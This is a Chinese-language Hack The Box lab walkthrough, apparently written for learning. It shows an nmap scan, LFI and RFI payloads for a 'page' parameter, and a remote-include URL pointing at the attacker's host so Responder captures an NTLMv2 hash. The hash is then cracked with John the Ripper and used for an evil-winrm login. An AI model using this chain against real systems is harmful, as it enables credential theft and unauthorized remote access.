首先获取到靶机

任务1

How many TCP ports are open on the machine?

机器上打开了多少个 TCP 端口？

使用nmap扫描一下全端口

sudo nmap -sS -sV 10.129.135.227 -p- -T5 -vv

任务2

When visiting the web service using the IP address, what is the domain that we are being redirected to?

使用 IP 地址访问 Web 服务时，我们被重定向到的域是什么？

这里使用浏览器访问一下，得到答案

unika.htb

这里虽然重定向到了域名，但是页面显示找不到。因此我们需要将该域名添加到主机的/etc/hosts文件中

任务3

Which scripting language is being used on the server to generate webpages?

服务器上使用哪种脚本语言来生成网页？

利用Wappalyzer插件进行查看即可

任务4

What is the name of the URL parameter which is used to load different language versions of the webpage?

用于加载不同语言版本网页的 URL 参数的名称是什么？

当我们更改网站语言时，url上会显示page参数，将页面传入。说明此处可能存在文件包含漏洞

page

任务5

Which of the following values for the pageparameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

page参数的以下哪个值是利用本地文件包含 (LFI) 漏洞的示例：“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

../../. ./../../../../../windows/system32/drivers/etc/hosts

任务6

Which of the following values for the pageparameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

page参数的以下哪个值是利用远程文件包含 (RFI) 漏洞的示例：“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

//10.10.14.6/somefile

任务7

What does NTLM stand for?

NTLM 代表什么？

New Technology LAN Manager

任务8

Which flag do we use in the Responder utility to specify the network interface?

我们在 Responder 实用程序中使用哪个标志来指定网络接口？

-I

responder工具有向LLMNR和NBT-NS请求进行欺骗的能力，欺骗受害主机发送NTLM v2 Hash。当网络中任何一台计算机尝试使用LLMNR或NBT-NS请求来解析目标计算机时，Responder假装为目标计算机，而当受害者计算机尝试访问攻击者计算机时，Responder就可以捕获受害者计算机用户的NTLMv2哈希，然后使用工具破解hash

Responder原理可参考https://www.freebuf.com/articles/network/256844.html

任务9

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码，以查看它们中的任何一个是否生成相同的响应。一种这样的工具通常被称为“john”，但全名是什么？

john the ripper  #用于破解NTLM哈希

任务10

What is the password for the administrator user?

管理员用户的密码是什么？

首先下载Responder工具https://github.com/lgandx/Responder

使用python运行responder监听指定网卡

python3 Responder.py -I <Interface_card_name>

由于网站存在RFI漏洞，可以利用远程访问本地任意文件，访问本地后，responder可以拿到administrator的hash密码

http://unika.htb/index.php?page=//10.10.14.173/somefile

将hash保存到本地（也可使用./DumpHash.py导出捕获的哈希值），然后使用john工具进行破解（时间特别久，也可使用hashcat）

任务11

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

我们将使用 Windows 服务（即在盒子上运行）使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么？

nmap扫描出的结果为5985

Flag

得到了服务器的用户和密码之后，使用evil-winrm工具连接服务器

evil-winrm -i 10.129.135.227 -u Administrator -p badminton

成功连接，翻阅下目录，最后在mike用户的Desktop目录中发现了flag